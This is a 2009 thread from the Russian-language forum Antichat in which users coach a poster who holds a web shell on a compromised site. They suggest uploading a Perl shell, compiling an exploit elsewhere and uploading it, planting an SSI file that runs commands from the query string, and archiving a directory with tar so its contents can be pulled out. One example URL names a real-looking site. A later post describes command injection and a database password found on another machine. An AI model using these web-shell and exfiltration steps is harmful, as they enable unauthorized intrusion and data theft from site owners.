ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.04.2009, 02:25
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
Byrger
если ты выполняешь
gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже
Safe-mode: ON
Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами
Пробуй залить перловый шелл, например r57pws.pl
Ищи в гугле
|
|
|

24.04.2009, 03:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием:
Код:
<!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
, и пользуй его, например
Код:
http://transsib-express.ru/path/shell.shtml?ls -lp
__________________
Карфаген должен быть разрушен...
|
|
|

24.04.2009, 05:36
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Нет это вовершенно 2 разных гелла!
Пытаюсь слить кантент с Safe-mode: ON
И зарутить с Safe-mode: OFF
|
|
|

24.04.2009, 05:37
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
2 Byrger
скомпиль на какой-нибудь другой тачке сплоит, да и загрузи его
|
|
|

24.04.2009, 05:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
__________________
Карфаген должен быть разрушен...
|
|
|

24.04.2009, 11:09
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от Scipio
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение?
Права сменить не могу = ( они стают (1234)
|
|
|

24.04.2009, 11:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.
может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
|
|
|

24.04.2009, 11:31
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от $n@ke
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.
может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
Ничего не выдаёт может из-за Safe-mode: ON
Сохраняю в дирку с правами 777
любой фаил пытаюсь c99 архивировать пишет...
Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!
Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
|
|
|

24.04.2009, 12:06
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
uname -a выводит? а uname?
если первое нет, то либо пробелы мещают, ищи замену(по принципу $IFS), либо еще чото. если и второе не вывело,то точно сейфмод. тогда с командной строкой тебе не поработать из пхп. Там кто-то писал про перловый скрипт р57 - вот его и юзай.
ps: кинь в личку линку - посмотрю.
|
|
|

24.04.2009, 17:58
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме: 276020
Репутация:
18
|
|
Если есть возможность выполнения любых команд на машине, но строка предварительно фильтруется на XSS, что можно сделать через такую дыру? команда cp копирует только локальные файлы почему-то  т.е. скопировать что-то указав полный путь к сайту не получается, вот и мучаюсь, пишу названия локальных файлов наугад, потом смотрю в публичной директории их...нарыл пароль от БД, но толку-то от него...
Кто-нибудь помогите пожалуйста!!!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|